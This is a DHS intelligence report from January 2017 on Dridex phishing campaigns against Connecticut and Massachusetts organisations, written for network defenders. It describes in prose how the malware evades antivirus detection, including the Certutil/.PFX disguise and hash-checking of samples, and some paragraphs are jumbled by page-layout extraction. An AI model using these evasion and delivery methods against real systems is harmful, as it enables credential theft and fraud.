(U//FOUO) Cyber Actors Alter Tactics, Techniques & Procedures Used In

UNCLASSIFIED//FOR OFFICIAL USE ONLY

26 January 2017 (U//FOUO) Cyber Actors Alter Tactics, Techniques & Procedures Used in Persistent Dridex Malware Campaigns, Continue Affecting New England Critical Infrastructure

(U//FOUO) Prepared by the DHS Office of Intelligence and Analysis (I&A) in collaboration with the Connecticut Intelligence Center and Massachusetts Commonwealth Fusion Center.

(U//FOUO) Scope: This Field Analysis Report (FAR) is intended to provide an assessment of the evolution of tactics, techniques, and procedures (TTPs) used by cyber actors engaged in Dridex malware phishing campaigns impacting critical infrastructure in the New England region. This FAR provides insight into how Dridex indicators have recently evolved to help public and private sector computer network defenders strengthen their cybersecurity posture.

(U) Key Judgments

• (U//FOUO) Despite a significant disruption to a major malware distribution network in 2016, cyber actors continued to spread Dridex to New England critical infrastructure systems.

• (U//FOUO) Cyber actors continually alter Dridex malware code to evade detection by signature-based antivirus software.

• (U//FOUO) Cyber actors use the command-line program Certutil and Personal Information Exchange (.PFX) files to deliver Dridex malware, allowing it to pose as a legitimate security certificate.

(U//FOUO) Overview of Dridex Malware Activity in New England

(U//FOUO) Dridex is distributed via phishing e-mails targeting specific business departments, predominantly accounting, budget, and finance offices. Once Dridex is active on a compromised system, that system can be used to send spam e-mails, execute distributed denial-of-service (DDoS) attacks, or to harvest user credentials for many online services, including banking services.1 Between April 2015 and August 2016, DHS received numerous incident reports involving Dridex malware campaigns targeting critical infrastructure in Connecticut and Massachusetts.2–21 These campaigns targeted several critical infrastructure sectors in both states.22–28

(U//FOUO) The majority of the Dridex phishing e-mails during this period contained malicious Microsoft Word, Excel, or executable file attachments with embedded macros that were hidden through obfuscated Visual Basic script. The attachments were created on an operating system using Cyrillic characters. According to open source reporting, the files most commonly identified were “W97M/Downloader” and “W97M/Bartallex.”29 There were command-and-control (C2) uniform resource locators (URLs) written within the obfuscated Visual Basic script, from which the Dridex payload was be pulled. The C2 URLs typically differed from one attachment to the next.30 The

IA-0073-17

(U) Warning: This document is UNCLASSIFIED//FOR OFFICIAL USE ONLY (U//FOUO). It contains information that may be exempt from public release under the Freedom of Information Act (5 U.S.C. 552). It is to be controlled, stored, handled, transmitted, distributed, and disposed of in accordance with DHS policy relating to FOUO information and is not to be released to the public, the media, or other personnel who do not have a valid need to know without prior approval of an authorized DHS official. State and local homeland security officials may share this document with authorized critical infrastructure and key resource personnel and private sector security officials without further approval from DHS.

(U) This product contains US person information that has been deemed necessary for the intended recipient to understand, assess, or act on the information provided. It has been highlighted in this document with the label USPER and should be handled in accordance with the recipient's intelligence oversight and/or information handling procedures.

UNCLASSIFIED//FOR OFFICIAL USE ONLY UNCLASSIFIED//FOR OFFICIAL USE ONLY

URLs were identified as recently compromised WordPress websites or other sites based in the United States or elsewhere. The obfuscated text also repeated scripts associated with .txt files, such as random alphanumeric naming conventions, along with text documents entitled “sasa.txt,” “lns.txt,” or “fafa.txt”.31,32 It is unknown what these text files contained. (U//FOUO) Dridex Malware (U) Once Dridex is installed and executed on an infected system, a cyber actor can upload or (U//FOUO) Dridex malware, previously known as Cridex download files from a victim’s computer.33 In addition, or Bugat, is a credential-stealing malicious software that cyber actors can execute files, monitor network traffic, has targeted the financial sector since 2014. According to USPER and take browser screenshots.34 Cyber actors also Dell Secureworks , Dridex steals credentials, certificates, cookies, and other sensitive information from may incorporate the infected system into a botnet for a compromised system, primarily to commit Automated use in DDoS attacks or to further propagate Dridex Clearing House (ACH) and wire fraud. Dridex was 35 malware. Once infected, cyber actors can created from the source code of the Bugat banking Trojan communicate with other peer nodes through the peer- but is distinct from previous Bugat variants, particularly to-peer (P2P) protocol to retrieve configuration with respect to its modular architecture and its use of a details, download and execute additional modules, hybrid peer-to-peer network to mask its backend download and execute additional files, and inject itself infrastructure and complicate takedown attempts. The source code for Dridex, Cridex, and Bugat contains into browser processes for Internet Explorer, Chrome, Cyrillic characters, which is consistent with the theory that and Firefox in order to monitor communications and the developers of Dridex were associated with an Eastern 36 steal information. European gang called “The Business Club,” which developed Gameover ZeuS botnet. (U) Dridex primarily impacts users by stealing their personal information, such as online banking account credentials, through its many personal information theft and browser monitoring routines.37 Stolen login credentials may lead to a victim’s other online accounts, such as social media, being broken into and/or hijacked.38 The screenshots taken may also inadvertently expose more personal information.39 In addition, a system infected with Dridex may be employed to send spam e-mails or execute DDoS attacks.40

(U//FOUO) Dridex Malware Campaigns Continue to Target New England Despite Temporary Disruption of Botnet Primarily used for Distribution

(U//FOUO) Despite a temporary disruption between (U//FOUO) Necurs Botnet May and June 2016 of the Necurs botnet, a major distribution network for Dridex, cyber actors continued (U//FOUO) According to Threatpost and Proofpoint, Necurs is one of the world’s largest botnets. Necurs is to distribute the malware to New England critical a malware family known for its rootkit capabilities. Its infrastructure, though at a reduced rate. According rootkit capabilities include both a user mode and a to open source reporting, the Necurs botnet played a kernel mode component, making it a very capable piece critical role in supporting the delivery of malicious of malware that is able to tamper with the system at the e-mails while obfuscating the identifiable details of the lowest level. Necurs is commonly installed by other cyber actors behind the campaigns.41 In May 2016, families of malware (e.g., Zeus, Dorkbot), but reports the Necurs botnet experienced an outage that show that it can also be distributed on its own using exploit kits. Once Necurs gains access to a system, resulted in a sudden drop in Dridex and Locky 42,43 it is able to steal user information, install additional ransomware infections. The botnet outage malware, or send spam e-mails. revealed that the network command-and-control center was actually controlling around 1.1 million hosts, contradicting previous host estimates in the tens of thousands.44,45

(U//FOUO) Dridex malware continued to affect critical infrastructure in New England by harvesting user credentials for online services, including banking services, or leveraging infected systems to engage in DDoS attacks. However, cyber actors are forgoing the use of Dridex malware for more profitable ransomware campaigns using many of the same distribution networks previously used for Dridex.46 The profitability of ransomware may account for the drop in Dridex campaigns more so than disruptions in botnets used for malware distribution.47

UNCLASSIFIED//FOR OFFICIAL USE ONLY Page 2 of 8 UNCLASSIFIED//FOR OFFICIAL USE ONLY

(U//FOUO) Cyber Actors May Implement New TTPs to Bypass Signature-based Antivirus Software

(U//FOUO) According to information from a credible cybersecurity firm, cyber actors engaged in Dridex malware campaigns have adopted new TTPs in an effort to evade signature-based antivirus software.48

(U//FOUO) Customized or regionalized malware is the (U//FOUO) Signature-Based Malware Detection most difficult form of malware to detect since the signature for the malware is constantly changing to (U//FOUO) When a malware arrives in the hands of an target specific regions, industries, or businesses.49 antivirus software firm, it is analyzed by malware Minor modifications to the malware, such as altering a researchers or by dynamic analysis systems. Then, once single character in the malware code, result in a change it is determined to be a malware, a proper signature of the to the signature algorithm, which allows the malware file file is extracted and added to the signatures database of to circumvent signature-based antivirus software until the antivirus software. Although the signature-based approach can effectively contain malware outbreaks, that new signature has been incorporated into the 50 malware authors have tried to stay a step ahead of such antivirus software’s list of malicious signatures. Free software by writing "oligomorphic", "polymorphic", and, online tools, such as VirusTotal, which analyzes files and more recently, "metamorphic" viruses, which encrypt parts URLs to identify viruses, worms, Trojans, and other of themselves or otherwise modify themselves as a kinds of malicious content, provide cyber actors the method of disguise, so as to not match virus signatures in ability to check their malware Hash values without the dictionary. actually submitting their malware files for analysis. This spares the cyber actor from having to sacrifice their malware just to check if other antivirus solutions might catch the data. HASH value is a numeric value of a fixed length that uniquely identifies data. Hash values represent large amounts of data as much smaller numeric values, so they are used with digital signatures.

(U//FOUO) Dridex Poses as Fake Certificate to Exploit Vulnerabilities in Security Solutions

(U) Prior to the Necurs outage, Dridex leveraged malicious Microsoft Office Word, Excel, and executable files, directing personal computing operators to activate their macros. Immediately after the macro support was enabled, the malicious files would then navigate to an embedded URL and downloaded the Dridex Trojan to the computer.51

(U) Changes in Dridex campaign modus operandi have made Dridex malware detection more challenging for antivirus software. Since June 2016, an increasing number of Dridex campaigns have used phishing e-mails with .ZIP file attachments.52 When the .ZIP file attachment is opened, a .PFX file is dropped. Certutil command line is used to unencrypt a base64 text file to convert the .PFX file to a .EXE file. The .EXE file then infects the system or network with Dridex.53

(U) Since the dropped file is initially in .PFX format, it enables Dridex to bypass detection.54 Both .PFX and Certutil are leveraged to pass off the malicious file as a legitimate certificate.55 Once systems recognize this fraudulent certificate/malicious file as a legitimate certificate, similar files will no longer be blocked or detected.56

(U) Recommendations

 (U) E-mail from unknown senders should be treated with caution. If an e-mail looks strange, do the following: ignore it, delete it, and never open attachments or click on URLs.

 (U) Opening file attachments, especially from unknown senders, harbors risks. Attachments should first be scanned with an antivirus program and, if necessary, deleted without being opened.

 (U) Never click links in e-mails without checking the URL. Many e-mail programs permit the actual target of the link to be seen using the mouse-over function, specifically by hovering the mouse over the visible link without actually clicking on it.

UNCLASSIFIED//FOR OFFICIAL USE ONLY Page 3 of 8 UNCLASSIFIED//FOR OFFICIAL USE ONLY

(U) DHS I&A Perspective

(U//FOUO) I&A assesses cyber actors’ use of Dridex poses a moderate and increasing threat to state and local networks because this type of malware is evolving and is used widely. Cyber actors can use Dridex to steal credentials and access sensitive systems, such as PII databases or industrial control systems, to commit financial theft against public entities with limited budgets, or to enable more disruptive malicious software like ransomware.

(U//FOUO) Comments, requests, or shareable intelligence may be directed to the Commonwealth Fusion Center at [email protected].

(U) Source Summary Statement

(U//FOUO) This FAR is based on cybersecurity incident reports and open sources. We have high confidence in the accuracy and reliability of cybersecurity incident findings. We have medium confidence in the information obtained from open sources, which include media reports and websites where information is credibly sourced and plausible but may contain biases or unintentional inaccuracies.

(U) Report Suspicious Activity

(U) To report suspicious activity, law enforcement, Fire-EMS, private security personnel, and emergency managers should follow established protocols; all other personnel should call 911 or contact local law enforcement. Suspicious activity reports (SARs) will be forwarded to the appropriate fusion center and FBI Joint Terrorism Task Force for further action. For more information on the Nationwide SAR Initiative, visit http://nsi.ncirc.gov/resources.aspx.

(U) Reporting Computer Security Incidents

(U) To report a computer security incident, either contact US-CERT at 888-282-0870, or go to https://forms.us- cert.gov/report/ and complete the US-CERT Incident Reporting System form. The US-CERT Incident Reporting System provides a secure, web-enabled means of reporting computer security incidents to US-CERT. An incident is defined as a violation or imminent threat of violation of computer security policies, acceptable use policies, or standard computer security practices. In general, types of activity commonly recognized as violating typical security policies include attempts (either failed or successful) to gain unauthorized access to a system or its data, including personally identifiable information; unwanted disruption or denial of service; the unauthorized use of a system for processing or storing data; and changes to system hardware, firmware, or software without the owner’s knowledge, instruction, or consent.

(U) Tracked by: TIO2015A1.1.1.2; TIO2015A.1.1.2.2.; TIO2015A.1.1.2.4; TIO2015A.1.1.2.17; USTA2750001614; ODHS2750000416; DIAC2700517415; DIAC1524507015; HSEC-1.7; HSEC-1.5; DHS-IA-CYB.3.1; JTF-E-PIR-4.3; HSEC- 1.10; HSEC-1.1; HSEC-1.2; JTF-E-PIR-4.6; DHS-IA-CYB.2.2; HSEC-1.8; HSEC-1.3; ACC-4.1.

UNCLASSIFIED//FOR OFFICIAL USE ONLY Page 4 of 8 UNCLASSIFIED//FOR OFFICIAL USE ONLY

1 (U); US-CERT; Alert (TA15-286A); “Dridex P2P Malware”; 29 SEP 2016; https://www.us-cert.gov/ncas/alerts/TA15-286A; accessed on 19 JAN 2017. 2 (U//FOUO); DHS; IIR 4 014 0078 16; 281900Z JUL 16; DOI 03 JUN 2016 – 30 JUN 2016; (U//FOUO); Foreign-Based Internet Protocol Addresses Hosting Malware Identified from Cyber-Activity Originating on U.S. State and Local Government Systems Between 3 and 30 June 2016; Extracted information is U//FOUO; Overall document classification is U//FOUO; (U//FOUO) ; A state government cybersecurity official with direct access during the course of official duties. 3 (U//FOUO); DHS; IIR 4 045 0089 16; 3013482 DEC 15; DOI 17 JUN 2015; (U//FOUO); CT - Technical Details of Malicious Spear Phishing Email Intending to Deliver Dridex Malware Received by State of Connecticut Government; Extracted information is U//FOUO; Overall document classification is U//FOUO; (U//FOUO); A state/local official with direct access to the information. 4 (U//FOUO); DHS; IIR 4 045 0144 16; 040112Z MAR 16; DOI 08 FEB 2016; (U//FOUO); MA-Technical Details of Dridex Associated Emails Received by Massachusetts-Based University; Extracted information is U//FOUO; Overall document classification is U/FOUO; (U//FOUO); A US Government official with first and secondhand access to the information through official duties. 5 (U//FOUO); DHS; IIR 4 045 0145 16; 040127Z MAR 16; DOI 02 APR 2015; (U//FOUO); MA-Technical Details of Dridex Associated Attachment Received by a Massachusetts-Based Information Technology Security Company; Extracted information is U//FOUO; Overall document classification is U//FOUO; (U//FOUO); A US Government official with secondhand access to the information through official duties. 6 (U//FOUO); DHS; IIR 4 045 0146 16; 040135Z MAR 16; DOI 08 OCT 2015 – 23 NOV 2015; (U//FOUO); MA-Technical Details of 11 Dridex Associated Attachments Received by a Massachusetts-Based Cleared Defense Contractor; Extracted information is U//FOUO; Overall document classification is U//FOUO; (U//FOUO); A US Government official with secondhand access to the information through official duties. 7 (U//FOUO); DHS; IIR 4 045 0147 16; 040141Z MAR 16; DOI 10 JUN 2015; (U//FOUO); CT - Technical Details of Dridex Associated Attachment Received by State of Connecticut Government; Extracted information is U//FOUO; Overall document classification is U//FOUO; (U//FOUO); A state/local official with direct access to the information. 8 (U//FOUO); DHS; IIR 4 045 0148 16; 040210Z MAR 16; DOI 22 JUL 2015; (U//FOUO); CT - Technical Details of Dridex Associated Email and Attachment Received by State of Connecticut Government; Extracted information is U//FOUO; Overall document classification is UFOUO; (U//FOUO); A state/local official with direct access to the information. 9 (U//FOUO); DHS; IIR 4 045 0149 16; 072317Z MAR 16; DOI 05 AUG 2015 - 07 OCT 2015; (U//FOUO); MA-Technical Details of 12 Dridex Malware Associated E-Mail Attachments Received by a Massachusetts-Based Cleared Defense Contractor; Extracted information is U//FOUO; Overall document classification is U//FOUO; A US Government official with secondhand access to the information through official duties. 10 (U//FOUO); DHS; IIR 4 045 0153 16; 151841Z MAR 16; DOI 03 DEC 2015; (U//FOUO); MA-Technical Details of Dridex Associated Spearphishing Email Received by a Massachusetts-Based University; Extracted information is U//FOUO; Overall document classification is U//FOUO; (U//FOUO); A US Government official with secondhand access to the information through official duties. 11 (U//FOUO); DHS; IIR 4 045 0154 16; 151847Z MAR 16; 15 JAN 2016; (U//FOUO); MA-Technical Details of Dridex Associated Email Attachment Received by a Massachusetts-Based University; Extracted information is U//FOUO; Overall document classification is U//FOUO; (U//FOUO); A US Government official with secondhand access to the information through official duties. 12 (U//FOUO); DHS; IIR 4 045 0156 16; 162044Z MAR 16; DOI 27 JAN 2016; (U//FOUO); MA-Technical Details of Dridex Associated Email Attachment Received by a Massachusetts-Based University; Extracted information is U//FOUO; Overall document classification is U//FOUO; (U//FOUO); A US Government official with secondhand access to the information through official duties. 13 (U//FOUO); DHS; IIR 4 045 0157 16; 171509Z MAR 16; DOI 27 NOV 2015; (U//FOUO); MA-Technical Details of Dridex Associated Email Attachment Received by a Massachusetts-Based University; Extracted information is U//FOUO; Overall document classification is U//FOUO; (U//FOUO); A US Government official with secondhand access to the information through official duties. 14 (U//FOUO); DHS; IIR 4 045 0160 16; 17 2144Z MAR 16; DOI 08 APR 2015; (U//FOUO); MA-Technical Details of Dridex Associated Email Attachment Received by a Massachusetts-Based Information Technology Security Company; Extracted information is U//FOUO; Overall document classification is U//FOUO; (U//FOUO); A US Government official with secondhand access to the information through official duties. 15 (U//FOUO); DHS; IIR 4 045 0161 16; 181817Z MAR 16; DOI 03 SEP 2015; (U//FOUO); CT - Technical Details of Malicious Spear Phishing Email Intending to Deliver Dridex Malware Received by State of Connecticut Government; Extracted information is U//FOUO; Overall document classification is U//FOUO; (U//FOUO); A state/local official with direct access to the information. 16 (U//FOUO); DHS; IIR 4 045 0162 16; 181823Z MAR 16; DOI 01 SEP 2015; (U//FOUO); CT - Technical Details of Malicious Spear Phishing Email Intending to Deliver Dridex Malware Received by State of Connecticut Government; Extracted information is U//FOUO; Overall document classification is U//FOUO; (U//FOUO); A state/local official with direct access to the information.

UNCLASSIFIED//FOR OFFICIAL USE ONLY Page 5 of 8 UNCLASSIFIED//FOR OFFICIAL USE ONLY

17 (U//FOUO); DHS; IIR 4 045 0170 16; 081801Z APR 16; DOI 28 MAR 2016; (U//FOUO); MA-Technical Details of Dridex Associated Email and Attachment Received by Commonwealth of Massachusetts Government; Extracted information is U//FOUO; Overall document classification is U//FOUO; (U//FOUO); A public sector cybersecurity official with direct and indirect access to information through official duties. 18 (U//FOUO); DHS; IIR 4 045 0180 16; 062309Z MAY 16; DOI 23 MAR 2016; (U//FOUO); MA-Technical Details of Dridex Associated Email Attachment Received by a Massachusetts-Based University; Extracted information is U//FOUO; Overall document classification is U//FOUO; A US Government official with secondhand access to the information through official duties. 19 (U//FOUO); DHS; IIR 4 045 0186 16; 13211Z MAY 16; DOI 22 MAR 2016; (U//FOUO); MA-Technical Details of Dridex Associated Email and Attachment Received by Commonwealth of Massachusetts Government; Extracted information is U//FOUO; Overall document classification is U//FOUO; (U//FOUO); A public sector cybersecurity official with direct and indirect access to information through official duties. 20 (U//FOUO); DHS; IIR 4 045 0192 16; 250238Z MAY 16; DOI 13 APR 2016; (U//FOUO); MA-Technical Details of Successful Dridex Infection on Commonwealth of Massachusetts Government Computer; Extracted information is U//FOUO; Overall document classification is U//FOUO; (U//FOUO); A public sector cybersecurity official with direct and indirect access to information through official duties. 21 (U//FOUO); DHS; IIR 4 045 0212 16; 221929Z JUL 16; DOI 07 JUL 2016; (U//FOUO); MA-Technical Details of Dridex Infection on Commonwealth of Massachusetts Government Computer; Extracted information is U//FOUO; Overall document classification is U//FOUO; (U//FOUO); A public sector cybersecurity official with direct and indirect access to information through official duties. 22 (U//FOUO); DHS; IIR 4 045 0089 16; 3013482 DEC 15; DOI 17 JUN 2015; (U//FOUO); CT - Technical Details of Malicious Spear Phishing Email Intending to Deliver Dridex Malware Received by State of Connecticut Government; Extracted information is U//FOUO; Overall document classification is U//FOUO; (U//FOUO); A state/local official with direct access to the information. 23 (U//FOUO); DHS; IIR 4 045 0170 16; 081801Z APR 16; DOI 28 MAR 2016; (U//FOUO); MA-Technical Details of Dridex Associated Email and Attachment Received by Commonwealth of Massachusetts Government; Extracted information is U//FOUO; Overall document classification is U//FOUO; (U//FOUO); A public sector cybersecurity official with direct and indirect access to information through official duties. 24 (U//FOUO); DHS; IIR 4 045 0145 16; 040127Z MAR 16; DOI 02 APR 2015; (U//FOUO); MA-Technical Details of Dridex Associated Attachment Received by a Massachusetts-Based Information Technology Security Company; Extracted information is U//FOUO; Overall document classification is U//FOUO; (U//FOUO); A US Government official with secondhand access to the information through official duties. 25 (U//FOUO); DHS; IIR 4 045 0146 16; 040135Z MAR 16; DOI 08 OCT 2015 - 23 NOV 2015; (U//FOUO); MA -Technical Details of 11 Dridex Associated Attachments Received by a Massachusetts-Based Cleared Defense Contractor; Extracted information is U//FOUO; Overall document classification is U//FOUO; (U//FOUO); A US Government official with secondhand access to the information through official duties. 26 (U//FOUO); DHS; IIR 4 045 0153 16; 151841Z MAR 16; DOI 03 DEC 2015; (U//FOUO); MA-Technical Details of Dridex Associated Spear-phishing Email Received by a Massachusetts-Based University; Extracted information is U//FOUO; Overall document classification is U//FOUO; (U//FOUO); A US Government official with secondhand access to the information through official duties. 27 (U//FOUO); DHS; IIR 4 045 0144 16; 040112Z MAR 16; DOI 08 FEB 2016; (U//FOUO); MA-Technical Details of Dridex Associated Emails Received by Massachusetts-Based University; Extracted information is U//FOUO; Overall document classification is U//FOUO; (U//FOUO); A US Government official with first and secondhand access to the information through official duties. 28 (U//FOUO); DHS; IIR 4 045 0144 16; 040112Z MAR 16; DOI 08 FEB 2016; (U//FOUO); MA-Technical Details of Dridex Associated Emails Received by Massachusetts-Based University; Extracted information is U//FOUO; Overall document classification is U//FOUO; (U//FOUO); A US Government official with first and secondhand access to the information through official duties. 29 (U); Jorge Arias and Yerko Grbic; McAfee Blog Central; “‘Banking’ Malware Dridex Arrives via Phishing Email”; 26 MAR 2015; https://blogs.mcafee.com/mcafee-labs/banking-malware-dridex-arrives-via-phishing-email/; accessed on 02 JUN 2016. 30 (U); Sudeep Singh, Geok Meng Ong, Joonho Sa, Ronghwa Chong, Shinsuke Honjo; FireEye Threat Research Blog; “Evolution of Dridex”; 18 JUN 2015; https://www.fireeye.com/blog/threat-research/2015/06/evolution_of_dridex.html; accessed on 02 JUN 2016. 31 (U//FOUO); DHS; IIR 4 045 0162 16; 181823Z MAR 16; DOI 01 SEP 2015; (U//FOUO); CT - Technical Details of Dridex Associated Email and Attachment Received by State of Connecticut Government; Extracted information is U//FOUO; Overall document classification is U//FOUO; (U//FOUO); A state cyber intelligence analyst with first and secondhand access to information through official duties. 32 (U//FOUO); DHS; IIR 4 045 0148 16; 040210Z MAR 16; DOI 22 JUL 2015; (U//FOUO); CT - Technical Details of Dridex Associated Email and Attachment Received by State of Connecticut Government; Extracted information is U//FOUO; Overall document classification is U//FOUO; A state cyber intelligence analyst with first and secondhand access to information through official duties.

UNCLASSIFIED//FOR OFFICIAL USE ONLY Page 6 of 8 UNCLASSIFIED//FOR OFFICIAL USE ONLY

33 (U); Mithun Sanghavi; Symantec Voice of the Customer Blog; “DRIDEX and how to overcome it”; 30 MAR 2015; https://www.symantec.com/connect/blogs/dridex-and-how-overcome-it; accessed on 10 OCT 2016. 34 (U); Mithun Sanghavi; Symantec Voice of the Customer Blog; “DRIDEX and how to overcome it”; 30 MAR 2015; https://www.symantec.com/connect/blogs/dridex-and-how-overcome-it; accessed on 10 OCT 2016. 35 (U); Mithun Sanghavi; Symantec Voice of the Customer Blog; “DRIDEX and how to overcome it”; 30 MAR 2015; https://www.symantec.com/connect/blogs/dridex-and-how-overcome-it; accessed on 10 OCT 2016. 36 (U); Mithun Sanghavi; Symantec Voice of the Customer Blog; “DRIDEX and how to overcome it”; 30 MAR 2015; https://www.symantec.com/connect/blogs/dridex-and-how-overcome-it; accessed on 10 OCT 2016. 37 (U); Mithun Sanghavi; Symantec Voice of the Customer Blog; “DRIDEX and how to overcome it”; 30 MAR 2015; https://www.symantec.com/connect/blogs/dridex-and-how-overcome-it; accessed on 10 OCT 2016. 38 (U); Mithun Sanghavi; Symantec Voice of the Customer Blog; “DRIDEX and how to overcome it”; 30 MAR 2015; https://www.symantec.com/connect/blogs/dridex-and-how-overcome-it; accessed on 10 OCT 2016. 39 (U); Mithun Sanghavi; Symantec Voice of the Customer Blog; “DRIDEX and how to overcome it”; 30 MAR 2015; https://www.symantec.com/connect/blogs/dridex-and-how-overcome-it; accessed on 10 OCT 2016. 40 (U); US-CERT; Alert (TA15-286A); “Dridex P2P Malware”; 29 SEP 2016; https://www.us-cert.gov/ncas/alerts/TA15-286A; accessed on 19 Jan 2017. 41 (U); Proofpoint; “It's Quiet...Too Quiet: Necurs Botnet Outage Crimps Dridex and Locky Distribution”; 09 JUN 2016; https://www.proofpoint.com/us/threat-insight/post/necurs-botnet-outage-crimps-dridex-and-locky-distribution; accessed in 19 AUG 2016; (U); Article published in the website of the cybersecurity company Proofpoint. 42 (U); Proofpoint; “It's Quiet...Too Quiet: Necurs Botnet Outage Crimps Dridex and Locky Distribution”; 09 JUN 2016; https://www.proofpoint.com/us/threat-insight/post/necurs-botnet-outage-crimps-dridex-and-locky-distribution; accessed in 19 AUG 2016; (U); Article published in the website of the cybersecurity company Proofpoint. 43 (U); Joe Uchill; The Hill; “Botnet behind major malware attacks goes offline”; 08 JUN 2016; http://thehill.com/policy/cybersecurity/282730-botnet-behind-major-malware-attacks-goes-offline; accessed on 19 AUG 2016. 44 (U); Proofpoint; “It's Quiet...Too Quiet: Necurs Botnet Outage Crimps Dridex and Locky Distribution”; 09 JUN 2016; https://www.proofpoint.com/us/threat-insight/post/necurs-botnet-outage-crimps-dridex-and-locky-distribution; accessed in 19 AUG 2016; (U); Article published in the website of the cybersecurity company Proofpoint. 45 (U); Joe Uchill, The Hill; “Botnet behind major malware attacks goes offline”; 08 JUN 2016; http://thehill.com/policy/cybersecurity/282730-botnet-behind-major-malware-attacks-goes-offline; accessed on 19 AUG 2016. 46 (U); Proofpoint; “It's Quiet...Too Quiet: Necurs Botnet Outage Crimps Dridex and Locky Distribution”; 09 JUN 2016; https://www.proofpoint.com/us/threat-insight/post/necurs-botnet-outage-crimps-dridex-and-locky-distribution; accessed in 19 AUG 2016; (U); Article published in the website of the cybersecurity company Proofpoint. 47 (U); Proofpoint; “It's Quiet...Too Quiet: Necurs Botnet Outage Crimps Dridex and Locky Distribution”; 09 JUN 2016; https://www.proofpoint.com/us/threat-insight/post/necurs-botnet-outage-crimps-dridex-and-locky-distribution; accessed in 19 AUG 2016; (U); Article published in the website of the cybersecurity company Proofpoint. 48 (U); Sudeep Singh, Geok Meng Ong, Joonho Sa, Ronghwa Chong, Shinsuke Honjo; FireEye Threat Research Blog; “Evolution of Dridex”; 18 JUN 2015; https://www.fireeye.com/blog/threat-research/2015/06/evolution_of_dridex.html; accessed on 02 JUN 2016. 49 (U); Deborah Radcliffe; CSO Online; “Polymorphic Malware: A Threat That Changes on the Fly”; 17 APR 2007; http://www.csoonline.com/article/2122123/malware-cybercrime/polymorphic-malware--a-threat-that-changes-on-the-fly.html; accessed on 19 AUG 2016; (U); Article published on CSO Online, which provides news and analysis on a variety of security and risk management topics. 50 (U); Dark Reading; “Machine Learning In Security: Good & Bad News About Signatures”; 30 MAR 2016; http://www.darkreading.com/attacks-breaches/machine-learning-in-security-good-and-bad-news-about-signatures/a/d- id/1324888; accessed on 13 OCT 2016; (U); Article published on the cybersecurity news website Dark Reading. 51 (U); Proofpoint; “It's Quiet...Too Quiet: Necurs Botnet Outage Crimps Dridex and Locky Distribution”; 09 JUN 2016; https://www.proofpoint.com/us/threat-insight/post/necurs-botnet-outage-crimps-dridex-and-locky-distribution; accessed in 19 AUG 2016; (U); Article published in the website of the cybersecurity company Proofpoint. 52 (U); Trend Micro; “DRIDEX Poses as Fake Certificate in Latest Spam”; 01 JUN 2016; http://blog.trendmicro.com/trendlabs- security-intelligence/dridex-poses-as-fake-certificate/?utm_source=trendlabs- social&utm_medium=twitter&utm_campaign=2016-06-dridex-certificate; accessed on 18 JAN 2017; (U); Article from Trend Micro’s Security Intelligence Blog. 53 (U); Trend Micro; “DRIDEX Poses as Fake Certificate in Latest Spam”; 01 JUN 2016; http://blog.trendmicro.com/trendlabs- security-intelligence/dridex-poses-as-fake-certificate/?utm_source=trendlabs- social&utm_medium=twitter&utm_campaign=2016-06-dridex-certificate; accessed on 18 JAN 2017; (U); Article from Trend Micro’s Security Intelligence Blog. 54 (U); Trend Micro; “DRIDEX Poses as Fake Certificate in Latest Spam”; 01 JUN 2016; http://blog.trendmicro.com/trendlabs- security-intelligence/dridex-poses-as-fake-certificate/?utm_source=trendlabs- social&utm_medium=twitter&utm_campaign=2016-06-dridex-certificate; accessed on 18 JAN 2017; (U); Article from Trend Micro’s Security Intelligence Blog.

UNCLASSIFIED//FOR OFFICIAL USE ONLY Page 7 of 8 UNCLASSIFIED//FOR OFFICIAL USE ONLY

55 (U); Trend Micro; “DRIDEX Poses as Fake Certificate in Latest Spam”; 01 JUN 2016; http://blog.trendmicro.com/trendlabs- security-intelligence/dridex-poses-as-fake-certificate/?utm_source=trendlabs- social&utm_medium=twitter&utm_campaign=2016-06-dridex-certificate; accessed on 18 JAN 2017; (U); Article from Trend Micro’s Security Intelligence Blog. 56 (U); Trend Micro; “DRIDEX Poses as Fake Certificate in Latest Spam”; 01 JUN 2016; http://blog.trendmicro.com/trendlabs- security-intelligence/dridex-poses-as-fake-certificate/?utm_source=trendlabs- social&utm_medium=twitter&utm_campaign=2016-06-dridex-certificate; accessed on 18 JAN 2017; (U); Article from Trend Micro’s Security Intelligence Blog.

UNCLASSIFIED//FOR OFFICIAL USE ONLY Page 8 of 8 CLASSIFICATION:

Office of Intelligence and Analysis Customer Feedback Form

Product Title: All survey responses are completely anonymous. No personally identifiable information is captured unless you voluntarily offer personal or contact information in any of the comment fields. Additionally, your responses are combined with those of many others and summarized in a report to further protect your anonymity. 1. Please select partner type: and function:

2. What is the highest level of intelligence information that you receive?

3. Please complete the following sentence: “I focus most of my time on:”

4. Please rate your satisfaction with each of the following: Neither Very Somewhat Satisfied nor Somewhat Very Satisfied Satisfied Dissatisfied Dissatisfied Dissatisfied N/A Product’s overall usefulness Product’s relevance to your mission Product’s timeliness Product’s responsiveness to your intelligence needs 5. How do you plan to use this product in support of your mission? (Check all that apply.) Drive planning and preparedness efforts, training, and/or Initiate a law enforcement investigation emergency response operations Intiate your own regional-specific analysis Observe, identify, and/or disrupt threats Intiate your own topic-specific analysis Share with partners Develop long-term homeland security strategies Allocate resources (e.g. equipment and personnel) Do not plan to use Reprioritize organizational focus Other: Author or adjust policies and guidelines 6. To further understand your response to question #5, please provide specific details about situations in which you might use this product. (Please Use Manuscript in the space provided.)

7. What did this product not address that you anticipated it would? (Please Use Manuscript in the space provided.)

8. To what extent do you agree with the following two statements? Strongly Neither Agree Strongly Agree Agree nor Disagree Disagree Disgree N/A This product will enable me to make better decisions regarding this topic. This product provided me with intelligence information I did not find elsewhere. 9. How did you obtain this product? 10. Would you be willing to participate in a follow-up conversation about your feedback?

To help us understand more about your organization so we can better tailor future products, please provide: Name: Position: Submit Organization: State: Feedback Contact Number: Email: Privacy Act Statement CLASSIFICATION: Product Serial Number: REV: 10 November 2016